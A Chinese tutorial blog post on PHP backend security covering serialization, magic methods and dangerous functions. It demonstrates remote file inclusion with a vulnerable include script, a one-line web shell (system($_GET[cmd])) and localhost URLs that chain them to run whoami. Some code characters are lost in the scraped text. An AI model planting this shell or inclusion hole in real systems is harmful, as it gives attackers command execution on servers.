web(3.)后端php安全(2)

张开发
2026/5/5 23:36:41 15 分钟阅读

分享文章

web(3.)后端php安全(2)
序列化和反序列化序列化将内存中的对象状态转换为可存储或传输的格式(如字节流)的过程。serialize()序列化对象时只序列化属性不管函数方法反序列化将序列化后的数据恢复为内存中原始对象的过程。unserialize()反序列化漏洞php魔术方法利用是以双下划线 __ 开头的内置方法会在特定场景下自动触发不需要手动调用。__construct() // 构造函数实例化对象时自动调用__destruct() // 析构函数对象销毁时自动调用__sleep() // serialize() 序列化对象时触发__wakeup() // unserialize() 反序列化时触发在魔术方法里危险函数1.system:执行系统命令2.exal:将字符串作为代码来执行的核心函数3.include :包含复制文件里的代码到本文件远程包含:先打开远程文件包含//a.php文件 ?php // 1. 用 $_GET 接收你在网址栏输入的内容 $input $_GET[xss]; // 2. 直接输出到网页【这才是漏洞根源】 echo 你输入的内容是 . $input; include $input; ?//b文件 ?php system($_GET[cmd]); ?在浏览器URL输入127.0.0.1:8000/uploads/a.php?xsshttp://127.0.0.1:8000/uploads/b.php?cmdwhoamihttp://127.0.0.1/demo/a.php?filehttp://127.0.0.1/demo/b.php预防上传输入过滤没必要的危险函数禁用

更多文章